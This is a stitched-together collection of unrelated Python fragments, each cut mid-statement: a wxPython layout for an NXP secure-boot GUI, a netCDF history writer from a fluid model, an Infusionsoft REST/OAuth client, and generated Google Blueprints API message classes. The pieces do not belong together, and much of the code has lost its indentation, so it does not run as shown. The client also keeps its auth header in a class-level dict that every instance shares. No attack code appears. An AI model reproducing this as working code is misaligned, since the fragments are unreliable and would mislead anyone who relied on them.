bSizer_setup.Add( self.m_notebook_portSetup, 1, wx.EXPAND |wx.ALL, 5 )
self.m_notebook_deviceStatus = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_panel_deviceStatus = wx.Panel( self.m_notebook_deviceStatus, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer_deviceStatus = wx.BoxSizer( wx.VERTICAL )
self.m_textCtrl_deviceStatus = wx.TextCtrl( self.m_panel_deviceStatus, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 250,158 ), wx.TE_MULTILINE|wx.TE_RICH2 )
bSizer_deviceStatus.Add( self.m_textCtrl_deviceStatus, 0, wx.ALL, 5 )
self.m_panel_deviceStatus.SetSizer( bSizer_deviceStatus )
self.m_panel_deviceStatus.Layout()
bSizer_deviceStatus.Fit( self.m_panel_deviceStatus )
self.m_notebook_deviceStatus.AddPage( self.m_panel_deviceStatus, u"Device Status", False )
bSizer_setup.Add( self.m_notebook_deviceStatus, 1, wx.EXPAND |wx.ALL, 5 )
wSizer_func.Add( bSizer_setup, 1, wx.EXPAND, 5 )
bSizer_boot = wx.BoxSizer( wx.VERTICAL )
wSizer_bootType = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_secureBootType = wx.StaticText( self, wx.ID_ANY, u"Secure Boot Type:", wx.DefaultPosition, wx.Size( 118,-1 ), 0 )
self.m_staticText_secureBootType.Wrap( -1 )
self.m_staticText_secureBootType.SetFont( wx.Font( 10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Rounded MT Bold" ) )
self.m_staticText_secureBootType.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BACKGROUND ) )
wSizer_bootType.Add( self.m_staticText_secureBootType, 0, wx.ALL, 5 )
m_choice_secureBootTypeChoices = [ u"DEV Unsigned Image Boot", u"HAB Signed Image Boot", u"HAB Encrypted Image Boot", u"BEE Encrypted Image Boot" ]
self.m_choice_secureBootType = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( 299,-1 ), m_choice_secureBootTypeChoices, 0 )
self.m_choice_secureBootType.SetSelection( 0 )
wSizer_bootType.Add( self.m_choice_secureBootType, 0, wx.ALL, 5 )
self.m_button_allInOneAction = wx.Button( self, wx.ID_ANY, u"All-In-One Action", wx.DefaultPosition, wx.Size( 124,-1 ), 0 )
wSizer_bootType.Add( self.m_button_allInOneAction, 0, wx.ALL, 5 )
self.m_staticText_null1BootType = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 30,-1 ), 0 )
self.m_staticText_null1BootType.Wrap( -1 )
wSizer_bootType.Add( self.m_staticText_null1BootType, 0, wx.ALL, 5 )
self.m_bitmap_nxp = wx.StaticBitmap( self, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 80,30 ), 0 )
wSizer_bootType.Add( self.m_bitmap_nxp, 0, wx.ALL, 5 )
bSizer_boot.Add( wSizer_bootType, 1, wx.EXPAND, 5 )
self.m_notebook_imageSeq = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,450 ), 0 )
self.m_notebook_imageSeq.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_genSeq = wx.Panel( self.m_notebook_imageSeq, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel_genSeq.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_genSeq.SetBackgroundColour( wx.Colour( 64, | |
= [state.get(v) for v in self.variables_in_history]
# block all ranks until rank 0 has created the folder(s)
mpitools.barrier()
# let be very cautious
assert os.path.isdir(self.output_directory)
# Create the history file and save the initial state
self.create_history_file(grid, variables)
#self.write_history_file(state, t, n)
#self.t_next_hist = t + self.dt_hist
@timing
def write(self, state, t, n):
"""Write the current state to the history file if it is time.
When new data was written to the disk, check if the available
disk space is still above the limit. Otherwise display a
warning and pause until the user has decided to continue.
Return True if the user decides to stop the simulation after a
low-disk-space warning. Return False if everything is fine.
Arguments:
- state: current state of the model run
- t: current time of the model run
- n: current integration step of the model
"""
if t < self.t_next_hist:
# Nothing to do yet
return False
# Otherwise it is time to write data to the history file
self.write_history_file(state, t, n)
self.t_next_hist += self.dt_hist
if self.disk_limit <= 0:
# No disk space limit defined
return False
# Otherwise check if the remaining disk space is sufficient
try:
free_space = self.get_disk_space_in_GB()
except Exception as e:
print("")
print("Cannot determine available disk space.")
print("Error message:", e)
print("Disabling further disk space checks.")
self.disk_limit = 0
# This is not a reason to stop the program
return False
if free_space >= self.disk_limit:
# Everything fine
return False
# Otherwise, print a warning
print("")
print("!"*50)
print("Warning, low disk space:")
print(
"{:.2f} GB remaining in the output directory {}"
.format(free_space, self.output_directory)
)
# Ask the user what to do
while True:
answer = input(
"Do you want to continue? [Y/n] "
).lower()
if answer == "n":
# Stop the program
return True
elif answer == "y" or answer == "":
# Check if more space is free now
try:
free_space = self.get_disk_space_in_GB()
except:
# Unknown error; check free space again next time
pass
else:
# elif cannot be used here
if free_space < self.disk_limit:
# The problem persists
print("Disabling further disk space checks.")
self.disk_limit = 0
# Continue the program
return False
else:
print('Unknown answer.', end=' ')
print('Please answer with "y" or "n".')
def finalize(self, state, t, n):
"""Write the final state to the history file if necessary.
Arguments:
- state: final state of the model run
- t: last point in time of the model run
- n: total number of integration steps in the model run
"""
# Write data to the history file if it is time to do so
if n != self.last_saved_frame:
self.write_history_file(state, t, n)
def save_array_3D(self, data, name, description=""):
"""Save a 3D array of data in the history file.
Arguments:
- data: 3D array of floats to be saved in the history file;
it must be given in the convention [z, y, x], which is
returned by view("i") for variables of type Scalar
- name: a short name used to reference the variable
- description (optional): additional text saved in the history
file together with the variable
"""
with nc.Dataset(self.hist_path, "a") as ncfile:
v = ncfile.createVariable(name, float, ("z", "y", "x"))
if description:
v.long_name = description
ncfile[name] = data
def create_history_file(self, grid: Grid, variables: list):
"""Create a new history file with “variables” living on “grid”."""
# Open new netCDF file for writing data to it (or for
# overwriting existing data)
with nc.Dataset(self.hist_path, "w") as ncfile:
# Store the experiment parameters
ncfile.setncatts(self.experiment_parameters)
# Create the dimensions
ncfile.createDimension("t") # unlimited size
self.idx = {}
k0, k1, j0, j1, i0, i1 = grid.domainindices
self.idx = {}
self.idx = {"x": slice(i0, i1),
"y": slice(j0, j1),
"z": slice(k0, k1)}
for x, i in zip("xyz", "ijk"):
if self.include_halo:
dimsize = grid.size[i]
# correct slice to None (i.e. all elements)
self.idx[x] = slice(None)
else:
dimsize = getattr(grid, "n"+x)
if self.simplified_grid:
ncfile.createDimension("{}".format(x), dimsize)
continue
# “p” stands for “point”: b-point, u-point, v-point, etc.
for p in ["b", "u", "v", "w", "vor_i", "vor_j", "vor_k"]:
ncfile.createDimension("{}_{}".format(x, p), dimsize)
# Create the variables with one dimension
v = ncfile.createVariable("n", int, ("t",))
v.long_name = "integration step in the model run"
v = ncfile.createVariable("t", float, ("t",))
v.long_name = "time in the model run"
v.units = self.unit("T")
if self.simplified_grid:
v = ncfile.createVariable("x", float, ("x",))
v.long_name = grid.x_b.name
v.units = self.unit(grid.x_b.dimension)
v[:] = grid.x_b_1D[self.idx["x"]]
v = ncfile.createVariable("y", float, ("y",))
v.long_name = grid.y_b.name
v.units = self.unit(grid.y_b.dimension)
v[:] = grid.y_b_1D[self.idx["y"]]
v = ncfile.createVariable("z", float, ("z",))
v.long_name = grid.z_b.name
v.units = self.unit(grid.z_b.dimension)
v[:] = grid.z_b_1D[self.idx["z"]]
else:
v = ncfile.createVariable("x_b", float, ("x_b",))
v.long_name = grid.x_b.name
v.units = self.unit(grid.x_b.dimension)
v[:] = grid.x_b_1D[self.idx["x"]]
v = ncfile.createVariable("y_b", float, ("y_b",))
v.long_name = grid.y_b.name
v.units = self.unit(grid.y_b.dimension)
v[:] = grid.y_b_1D[self.idx["y"]]
v = ncfile.createVariable("z_b", float, ("z_b",))
v.long_name = grid.z_b.name
v.units = self.unit(grid.z_b.dimension)
v[:] = grid.z_b_1D[self.idx["z"]]
v = ncfile.createVariable("x_u", float, ("x_u",))
v.long_name = grid.x_vel["i"].name
v.units = self.unit(grid.x_vel["i"].dimension)
v[:] = grid.x_u_1D[self.idx["x"]]
v = ncfile.createVariable("y_u", float, ("y_u",))
v.long_name = grid.y_vel["i"].name
v.units = self.unit(grid.y_vel["i"].dimension)
v[:] = grid.y_u_1D[self.idx["y"]]
v = ncfile.createVariable("z_u", float, ("z_u",))
v.long_name = grid.z_vel["i"].name
v.units = self.unit(grid.z_vel["i"].dimension)
v[:] = grid.z_u_1D[self.idx["z"]]
v = ncfile.createVariable("x_v", float, ("x_v",))
v.long_name = grid.x_vel["j"].name
v.units = self.unit(grid.x_vel["j"].dimension)
v[:] = grid.x_v_1D[self.idx["x"]]
v = ncfile.createVariable("y_v", float, ("y_v",))
v.long_name = grid.y_vel["j"].name
v.units = self.unit(grid.y_vel["j"].dimension)
v[:] = grid.y_v_1D[self.idx["y"]]
v = ncfile.createVariable("z_v", float, ("z_v",))
v.long_name = grid.z_vel["j"].name
v.units = self.unit(grid.z_vel["j"].dimension)
v[:] = grid.z_v_1D[self.idx["z"]]
v = ncfile.createVariable("x_w", float, ("x_w",))
v.long_name = grid.x_vel["k"].name
v.units = self.unit(grid.x_vel["k"].dimension)
v[:] = grid.x_w_1D[self.idx["x"]]
v = ncfile.createVariable("y_w", float, ("y_w",))
v.long_name = grid.y_vel["k"].name
v.units = self.unit(grid.y_vel["k"].dimension)
v[:] = grid.y_w_1D[self.idx["y"]]
v = ncfile.createVariable("z_w", float, ("z_w",))
v.long_name = grid.z_vel["k"].name
v.units = self.unit(grid.z_vel["k"].dimension)
v[:] = grid.z_w_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_i", float, ("x_vor_i",))
v.long_name = grid.x_vor["i"].name
v.units = self.unit(grid.x_vor["i"].dimension)
v[:] = grid.x_vor_i_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_i", float, ("y_vor_i",))
v.long_name = grid.y_vor["i"].name
v.units = self.unit(grid.y_vor["i"].dimension)
v[:] = grid.y_vor_i_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_i", float, ("z_vor_i",))
v.long_name = grid.z_vor["i"].name
v.units = self.unit(grid.z_vor["i"].dimension)
v[:] = grid.z_vor_i_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_j", float, ("x_vor_j",))
v.long_name = grid.x_vor["j"].name
v.units = self.unit(grid.x_vor["j"].dimension)
v[:] = grid.x_vor_j_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_j", float, ("y_vor_j",))
v.long_name = grid.y_vor["j"].name
v.units = self.unit(grid.y_vor["j"].dimension)
v[:] = grid.y_vor_j_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_j", float, ("z_vor_j",))
v.long_name = grid.z_vor["j"].name
v.units = self.unit(grid.z_vor["j"].dimension)
v[:] = grid.z_vor_j_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_k", float, ("x_vor_k",))
v.long_name = grid.x_vor["k"].name
v.units = self.unit(grid.x_vor["k"].dimension)
v[:] = grid.x_vor_k_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_k", float, ("y_vor_k",))
v.long_name = grid.y_vor["k"].name
v.units = self.unit(grid.y_vor["k"].dimension)
v[:] = grid.y_vor_k_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_k", float, ("z_vor_k",))
v.long_name = grid.z_vor["k"].name
v.units = self.unit(grid.z_vor["k"].dimension)
v[:] = grid.z_vor_k_1D[self.idx["z"]]
# TODO: add mask if a mask is implemented
# Create variables for the model data and create a dict of
# the history file variables to make writing new data easy
self.hist_variables = {}
for variable in variables:
nickname = variable.nickname
nature = variable.get_nature()
if nature == "scalar":
# Use in the history file the same name as in the model
hist_name = nickname
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_b", "y_b", "x_b"),
)
v.long_name = variable.name
v.units = self.unit(variable.dimension)
self.hist_variables[hist_name] = nickname
elif nature == "velocity":
if nickname == "u":
# Use in the history file the name u/v/w
modifier = str.lower
elif nickname == "U":
# Use in the history file the name U/V/W
modifier = str.upper
else:
raise NotImplementedError(
"unknown kind of velocity: " + nickname
)
for i, u in zip("ijk", "uvw"):
hist_name = modifier(u)
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_" + u, "y_" + u, "x_" + u),
)
v.long_name = variable[i].name
v.units = self.unit(variable[i].dimension)
self.hist_variables[hist_name] = variable[i].nickname
elif nature == "vorticity":
for i in "ijk":
# Use in the history file the same name as in the model
hist_name = variable[i].nickname
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_vor_" + i, "y_vor_" + i, "x_vor_" + i),
)
v.long_name = variable[i].name
v.units = self.unit(variable[i].dimension)
self.hist_variables[hist_name] = variable[i].nickname
else:
raise ValueError(
"unknown nature", nature, "of variable", nickname
)
def write_history_file(self, state, t, n):
"""Append the given | |
import requests
import json
from base64 import b64encode
"""
Documentation of the API: https://developer.infusionsoft.com/docs/rest/
"""
class Client:
api_base_url = "https://api.infusionsoft.com/crm/rest/v1/"
header = {"Accept": "application/json, */*", "content-type": "application/json"}
def __init__(self, client_id=None, client_secret=None, token=None):
self.client_id = client_id
self.client_secret = client_secret
self.token = token
def make_request(self, method, endpoint, data=None, json=None, **kwargs):
"""
this method do the request petition, receive the different methods (post, delete, patch, get) that the api allow
:param method:
:param endpoint:
:param data:
:param kwargs:
:return:
"""
if self.token:
self.header["Authorization"] = "Bearer " + self.token
url = '{0}{1}'.format(self.api_base_url, endpoint)
if method == "get":
response = requests.request(method, url, headers=self.header, params=kwargs)
else:
response = requests.request(method, url, headers=self.header, data=data, json=json)
return self.parse_response(response)
else:
raise Exception("To make petitions the token is necessary")
def _get(self, endpoint, data=None, **kwargs):
return self.make_request('get', endpoint, data=data, **kwargs)
def _post(self, endpoint, data=None, json=None, **kwargs):
return self.make_request('post', endpoint, data=data, json=json, **kwargs)
def _delete(self, endpoint, **kwargs):
return self.make_request('delete', endpoint, **kwargs)
def _patch(self, endpoint, data=None, json=None, **kwargs):
return self.make_request('patch', endpoint, data=data, json=json, **kwargs)
def _put(self, endpoint, json=None, **kwargs):
return self.make_request('put', endpoint, json=json, **kwargs)
def parse_response(self, response):
"""
This method get the response request and returns json data or raise exceptions
:param response:
:return:
"""
if response.status_code == 204 or response.status_code == 201:
return True
elif response.status_code == 400:
raise Exception(
"The URL {0} retrieved an {1} error. Please check your request body and try again.\nRaw message: {2}".format(
response.url, response.status_code, response.text))
elif response.status_code == 401:
raise Exception(
"The URL {0} retrieved and {1} error. Please check your credentials, make sure you have permission to perform this action and try again.".format(
response.url, response.status_code))
elif response.status_code == 403:
raise Exception(
"The URL {0} retrieved and {1} error. Please check your credentials, make sure you have permission to perform this action and try again.".format(
response.url, response.status_code))
elif response.status_code == 404:
raise Exception(
"The URL {0} retrieved an {1} error. Please check the URL and try again.\nRaw message: {2}".format(
response.url, response.status_code, response.text))
return response.json()
def oauth_access(self, callback):
    """Build the URL that starts the OAuth 2.0 authorization flow.

    :param callback: redirect URI registered for this application.
    :return: the authorization URL the user should be sent to.
    :raises Exception: if the client id or *callback* is missing.
    """
    # Stdlib import kept local so the module-level import block is untouched.
    from urllib.parse import urlencode

    if self.client_id is None or callback is None:
        raise Exception("The attributes necessary to get the url were not obtained.")
    # urlencode percent-escapes the redirect URI; the previous string
    # formatting embedded it raw, which produces an invalid query string
    # whenever the callback contains '?', '&' or '='.
    query = urlencode({
        'client_id': self.client_id,
        'redirect_uri': callback,
        'response_type': 'code',
        'scope': 'full',
    })
    return "https://signin.infusionsoft.com/app/oauth/authorize?" + query
def exchange_code(self, redirect_uri, code):
    """Trade the authorization *code* for an access token.

    :param redirect_uri: the redirect URI used in the authorize step.
    :param code: the authorization code returned by Infusionsoft.
    :return: the parsed token response.
    :raises Exception: if any required credential is missing.
    """
    required = (self.client_id, self.client_secret, redirect_uri, code)
    if any(item is None for item in required):
        raise Exception("The attributes necessary to exchange the code were not obtained.")
    payload = {
        'client_id': self.client_id,
        'redirect_uri': redirect_uri,
        'client_secret': self.client_secret,
        'code': code,
        'grant_type': 'authorization_code',
    }
    response = requests.post("https://api.infusionsoft.com/token", data=payload)
    return self.parse_response(response)
def refresh_token(self, refresh_token):
    """Obtain a fresh access token from *refresh_token*.

    Uses HTTP Basic auth built from client_id/client_secret.
    :raises Exception: if client_id, client_secret or the token is missing.
    """
    if self.client_id is None or self.client_secret is None or refresh_token is None:
        raise Exception("The attributes necessary to refresh the token were not obtained.")
    credentials = '{0}:{1}'.format(self.client_id, self.client_secret)
    basic = b64encode(credentials.encode('UTF-8')).decode('UTF-8')
    response = requests.post(
        "https://api.infusionsoft.com/token",
        headers={'Authorization': 'Basic {0}'.format(basic)},
        data={'grant_type': 'refresh_token', 'refresh_token': refresh_token},
    )
    return self.parse_response(response)
def set_token(self, token):
    """Remember *token* for later API calls; an empty string is ignored."""
    if token == "":
        return
    self.token = token
def get_data(self, endpoint, **kwargs):
    """GET *endpoint*, forwarding any filter options as query parameters."""
    return self._get(endpoint, **kwargs)
def create_data(self, endpoint, **kwargs):
    """POST *kwargs* as the JSON body of *endpoint*.

    ``**kwargs`` is always a dict (never None), so the previous
    ``if kwargs is not None`` guard was dead code and has been removed;
    behaviour is unchanged (an empty body posts ``{}``).
    """
    return self._post(endpoint, json=dict(kwargs))
def update_data(self, endpoint, data_id, **kwargs):
    """PATCH *kwargs* onto ``endpoint/data_id``.

    :raises Exception: if *data_id* is empty. Previously an empty id
        silently returned None; raising matches the behaviour of
        update_contact / update_task.
    """
    if data_id == "":
        raise Exception("The ID is necessary")
    url = '{0}/{1}'.format(endpoint, data_id)
    return self._patch(url, json=dict(kwargs))
def delete_data(self, endpoint, data_id):
    """DELETE ``endpoint/data_id``.

    :raises Exception: if *data_id* is empty. Previously an empty id was
        a silent no-op returning None; raising matches delete_contact /
        delete_task.
    """
    if data_id == "":
        raise Exception("The ID is necessary")
    return self._delete('{0}/{1}'.format(endpoint, data_id))
def get_contact_custom_fields(self):
    """List the custom fields defined for contacts."""
    return self._get('contactCustomFields')
def get_contacts(self, **kwargs):
    """List contacts.

    Call with no arguments for everything, or filter with ``limit``,
    ``order``, ``offset`` and the other options described in the API
    documentation.
    """
    return self._get('contacts', **kwargs)
def retrieve_contact(self, id, **kwargs):
    """Fetch a single contact by *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._get('contacts/{0}'.format(id), **kwargs)
def create_contact(self, **kwargs):
    """Create a contact from *kwargs*.

    The API requires at least an email address or a phone number
    (``given_name`` is recommended too). The previous
    ``if kwargs is not None`` guard was always true, which made the
    validation raise below unreachable; it now actually fires when no
    fields are supplied.
    :raises Exception: if *kwargs* is empty.
    """
    if not kwargs:
        raise Exception("To create a contact is necessary a valid name and email")
    return self._post('contacts', json=dict(kwargs))
def delete_contact(self, id):
    """Delete the contact identified by *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._delete('contacts/{0}'.format(id))
def update_contact(self, id, **kwargs):
    """PATCH *kwargs* onto contact *id*.

    See the API documentation for the accepted fields.
    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is obligatory")
    return self._patch('contacts/{0}'.format(id), json=dict(kwargs))
def get_campaigns(self, **kwargs):
    """List campaigns, optionally filtered (``limit``, ``offset``, ...).

    See the API documentation for all filter options.
    """
    return self._get('campaigns', **kwargs)
def retrieve_campaign(self, id, **kwargs):
    """Fetch a single campaign by *id*.

    See the API documentation for additional options.
    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._get('campaigns/{0}'.format(id), **kwargs)
def get_emails(self, **kwargs):
    """List emails; filter options (``limit``, ``offset``, ...) are in the API docs."""
    return self._get('emails', **kwargs)
def get_opportunities(self, **kwargs):
    """List opportunities, optionally filtered (``limit``, ``order``, ``offset``)."""
    return self._get('opportunities', **kwargs)
def get_opportunities_pipeline(self):
    """Return the pipeline of opportunity stages."""
    return self._get('opportunity/stage_pipeline')
def retrieve_opportunity(self, id, **kwargs):
    """Fetch a single opportunity by *id*.

    Bug fix: *kwargs* are now expanded (``**kwargs``) instead of being
    passed as one positional argument (which landed in ``_get``'s
    ``data`` parameter), matching retrieve_contact / retrieve_campaign.
    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._get('opportunities/{0}'.format(id), **kwargs)
def create_opportunity(self, **kwargs):
    """POST a new opportunity built from *kwargs*.

    The API requires ``opportunity_title``, ``contact`` and ``stage``;
    see the API documentation. The previous ``if kwargs is not None``
    guard was always true (``**kwargs`` is never None) and has been
    removed; behaviour is unchanged.
    """
    return self._post('opportunities', json=dict(kwargs))
def update_opportunity(self, id, **kwargs):
    """PATCH *kwargs* onto opportunity *id*.

    See the API documentation for the accepted fields.
    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._patch('opportunities/{0}'.format(id), json=dict(kwargs))
def get_products(self, **kwargs):
    """Search products, forwarding any filter options."""
    return self._get('products/search', **kwargs)
def retrieve_product(self, id):
    """Fetch one product by *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._get("products/{0}".format(id))
def get_tasks(self, **kwargs):
    """List tasks, forwarding any filter options."""
    return self._get('tasks', **kwargs)
def create_task(self, **kwargs):
    """Create a task; the API requires a ``title`` and a ``due_date``.

    The previous ``if kwargs is not None`` guard was always true, making
    the validation raise unreachable; it now fires when no fields are
    supplied.
    :raises Exception: if *kwargs* is empty.
    """
    if not kwargs:
        raise Exception("To create a task is necessary a title and a due_date")
    return self._post('tasks', json=dict(kwargs))
def delete_task(self, id):
    """Delete the task identified by *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._delete('tasks/{0}'.format(id))
def update_task(self, id, **kwargs):
    """PATCH *kwargs* onto task *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is obligatory")
    return self._patch('tasks/{0}'.format(id), json=dict(kwargs))
def retrieve_task(self, id):
    """Fetch one task by *id*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._get("tasks/{0}".format(id))
def replace_task(self, id, **kwargs):
    """PUT (full replace) task *id* with *kwargs*.

    :raises Exception: if *id* is empty.
    """
    if id == "":
        raise Exception("The ID is necessary")
    return self._put("tasks/{0}".format(id), **kwargs)
def get_orders(self, **kwargs):
    """List e-commerce orders, forwarding any filter options."""
    return self._get('orders', **kwargs)
def retrieve_order(self, id):
if | |
supported (00000000-0000-0000-0000-000000000000).
"""
parent = _messages.StringField(1, required=True)
preview = _messages.MessageField('Preview', 2)
requestId = _messages.StringField(3)
# NOTE: generated API message class — field numbers are wire-format
# identifiers; do not renumber or rename fields by hand.
class DeleteInput(_messages.Message):
r"""Input parameters for preview of delete operation.
Fields:
deployment: Required. Name of existing deployment to preview its deletion.
Format:
`projects/{project}/locations/{location}/deployments/{deployment}`
"""
deployment = _messages.StringField(1)
# NOTE: generated API message class — enum integer values and field
# numbers are part of the wire contract; do not renumber them.
class Deployment(_messages.Message):
r"""A Deployment object.
Enums:
ErrorCodeValueValuesEnum: Output only. Code describing any errors that may
have occurred.
StateValueValuesEnum: Output only. Current state of the deployment.
Messages:
LabelsValue: User-defined metadata for the deployment.
Fields:
blueprint: Required. Blueprint to deploy.
configController: Required. Config Controller instance to deploy to.
Format:
`projects/{project}/locations/{location}/krmApiHosts/{instance}`.
createConfigController: Optional. If set, then a Config Controller
instance with a default, well-known name will be created as part of the
deployment, if it does not already exist. Note that Blueprints
Controller does not manage this Config Controller instance and only
creates it.
createTime: Output only. Time the deployment was created.
deleteResults: Output only. Locations of outputs from delete operation.
errorCode: Output only. Code describing any errors that may have occurred.
gitTarget: Optional. If set, then the hydrated blueprint will be uploaded
to the specified Git repository.
labels: User-defined metadata for the deployment.
latestRevision: Output only. Revision that was most recently applied.
Format:
`projects/{project}/locations/{location}/deployments/{deployment}/
revisions/{revision}`
name: Resource name of the deployment. Format:
`projects/{project}/locations/{location}/deployments/{deployment}`
reconcileTimeout: Optional. How long apply attempt should wait for
resource reconciliation on the Config Controller cluster to complete. If
unset, a default value of 5m will be used. A value of 0s indicates that
the Deployment will be ACTIVE as soon as resources are applied
successfully to the cluster and final resource actuation status will
need to be polled on asynchronously.
state: Output only. Current state of the deployment.
stateDetail: Output only. Additional information regarding the current
state.
updateTime: Output only. Time the deployment was last modified.
"""
class ErrorCodeValueValuesEnum(_messages.Enum):
r"""Output only. Code describing any errors that may have occurred.
Values:
ERROR_CODE_UNSPECIFIED: No error code was specified.
REVISION_FAILED: The revision failed (check its error code).
CLUSTER_CREATION_PERMISSION_DENIED: Cluster creation failed due to a
permissions issue.
CLOUD_BUILD_PERMISSION_DENIED: Cloud Build failed due to a permissions
issue.
CLUSTER_CREATION_FAILED: Cluster creation failed for a non-permissions-
related issue.
DELETE_BUILD_API_FAILED: The deletion Cloud Build failed before logs
could be generated.
DELETE_BUILD_RUN_FAILED: The deletion Cloud Build failed after logs
could be generated.
BUCKET_CREATION_PERMISSION_DENIED: A Cloud Storage bucket failed due to
a permissions issue.
BUCKET_CREATION_FAILED: A Cloud Storage bucket failed for a non-
permissions-related issue.
"""
ERROR_CODE_UNSPECIFIED = 0
REVISION_FAILED = 1
CLUSTER_CREATION_PERMISSION_DENIED = 2
CLOUD_BUILD_PERMISSION_DENIED = 3
CLUSTER_CREATION_FAILED = 4
DELETE_BUILD_API_FAILED = 5
DELETE_BUILD_RUN_FAILED = 6
BUCKET_CREATION_PERMISSION_DENIED = 7
BUCKET_CREATION_FAILED = 8
class StateValueValuesEnum(_messages.Enum):
r"""Output only. Current state of the deployment.
Values:
STATE_UNSPECIFIED: The default value. This value is used if the state is
omitted.
CREATING: The deployment is being created.
ACTIVE: The deployment is healthy.
UPDATING: The deployment is being updated.
DELETING: The deployment is being deleted.
FAILED: The deployment has encountered an unexpected error.
SUSPENDED: The deployment is no longer being actively reconciled. This
may be the result of recovering the project after deletion.
"""
STATE_UNSPECIFIED = 0
CREATING = 1
ACTIVE = 2
UPDATING = 3
DELETING = 4
FAILED = 5
SUSPENDED = 6
# LabelsValue keeps arbitrary user labels; unrecognized keys are mapped
# into additionalProperties by the decorator below.
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""User-defined metadata for the deployment.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
blueprint = _messages.MessageField('Blueprint', 1)
configController = _messages.StringField(2)
createConfigController = _messages.BooleanField(3)
createTime = _messages.StringField(4)
deleteResults = _messages.MessageField('ApplyResults', 5)
errorCode = _messages.EnumField('ErrorCodeValueValuesEnum', 6)
gitTarget = _messages.MessageField('GitTarget', 7)
labels = _messages.MessageField('LabelsValue', 8)
latestRevision = _messages.StringField(9)
name = _messages.StringField(10)
reconcileTimeout = _messages.StringField(11)
state = _messages.EnumField('StateValueValuesEnum', 12)
stateDetail = _messages.StringField(13)
updateTime = _messages.StringField(14)
# NOTE: generated API message class — enum values / field numbers are
# wire-format identifiers; do not renumber.
class DeploymentOperationMetadata(_messages.Message):
r"""Ephemeral metadata content describing the state of a deployment
operation.
Enums:
StepValueValuesEnum: The current step the deployment operation is running.
Fields:
applyResults: Locations of outputs from config application.
pipelineResults: Locations of outputs from kpt pipeline execution.
step: The current step the deployment operation is running.
"""
class StepValueValuesEnum(_messages.Enum):
r"""The current step the deployment operation is running.
Values:
DEPLOYMENT_STEP_UNSPECIFIED: No deployment step was specified.
PREPARING_STORAGE_BUCKET: Checking for existence of a storage bucket and
creating one in it's absence. This can take up to 7 minutes on the
first deployment.
PREPARING_CONFIG_CONTROLLER: Checking for existence of a Config
Controller instance and creating one in it's absence. This can take up
to 20 minutes on the first deployment.
CREATING_REVISION: Creating a revision resource.
RUNNING_PIPELINE: Blueprint is being processed.
RUNNING_APPLY: Blueprint is being applied to Config Controller.
RUNNING_PREVIEW: Blueprint is being previewed with Config Controller.
"""
DEPLOYMENT_STEP_UNSPECIFIED = 0
PREPARING_STORAGE_BUCKET = 1
PREPARING_CONFIG_CONTROLLER = 2
CREATING_REVISION = 3
RUNNING_PIPELINE = 4
RUNNING_APPLY = 5
RUNNING_PREVIEW = 6
applyResults = _messages.MessageField('ApplyResults', 1)
pipelineResults = _messages.MessageField('PipelineResults', 2)
step = _messages.EnumField('StepValueValuesEnum', 3)
# NOTE: generated; mirrors google.protobuf.Empty — intentionally has no fields.
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
# NOTE: generated API message class mirroring google.type.Expr (CEL
